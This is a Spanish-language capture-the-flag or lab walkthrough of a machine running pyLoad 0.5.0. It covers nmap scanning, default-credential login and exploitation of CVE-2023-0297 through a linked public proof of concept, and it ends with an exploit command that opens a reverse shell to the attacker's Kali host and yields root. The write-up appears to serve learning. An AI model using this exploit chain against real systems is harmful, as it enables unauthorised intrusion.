MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)

Enumere los puertos de la maquina utilizando lo siguientes comandos:

nmap -p- --open --min-rate 4000 -sS -v -Pn <ip>

# datos de los comandos:

-p-: indica que realize el escaneo en los 65365 puertos

--open: indica que solo muestre los puertos abiertos

--min-rate 4000: lo use para que envie no menos de 4000 paquetes por segundo.

-sS: realiza un escaneo sigiloso, en lugar de completar la conexión con un ACK,

Nmap envía un **RST** (reset), evitando establecer una conexión completa.

-v: muestra por consola los puertos que se encuentran abiertos

-Pn: deshabilita la deteccion de hosts.

Seguidamente como obtuve solo 2 puertos ejecute nmap con lo parámetro "-sCV" para que me muestre los servicios y la versiones de esos servicios.

Como tengo un servidor web en el puerto 9666 con whatweb voy a ver las tecnologías que emplean en dicho servidor.

Ya al tener los resultado de whatweb, ingreso al sitio web para realizar un reconocimiento mas cómodo.

Luego de cargar la web, encontré un panel de login de un software llamado "pyLoad", probé credenciales por defecto como en toda prueba y no resulto.

Pase por google para ver si existen credenciales que vengan por defecto.

Luego use las encontradas, una vez colocada obtuve acceso dentro del panel administrador.

Tengo la versión del software es la 0.5.0. Con la versión en la mano busque si contiene alguna vulnerabilidad en google.

https://github.com/JacobEbben/CVE-2023-0297

Este software es vulnerable a un RCE no autenticado por lo que no necesariamente necesitaría las credenciales.

Primero ejecute el siguiente comando donde me indico un PoC.

Reemplace los comandos y le agregue mi IP y un puerto .. esto va a realizar una conexión con mi kali.

python3 exploit.py -t http://192.168.106.26:9666/ -I 192.168.45.240 -P 4443

Ejecute el exploit y accedí dentro de la maquina como root.

Last updated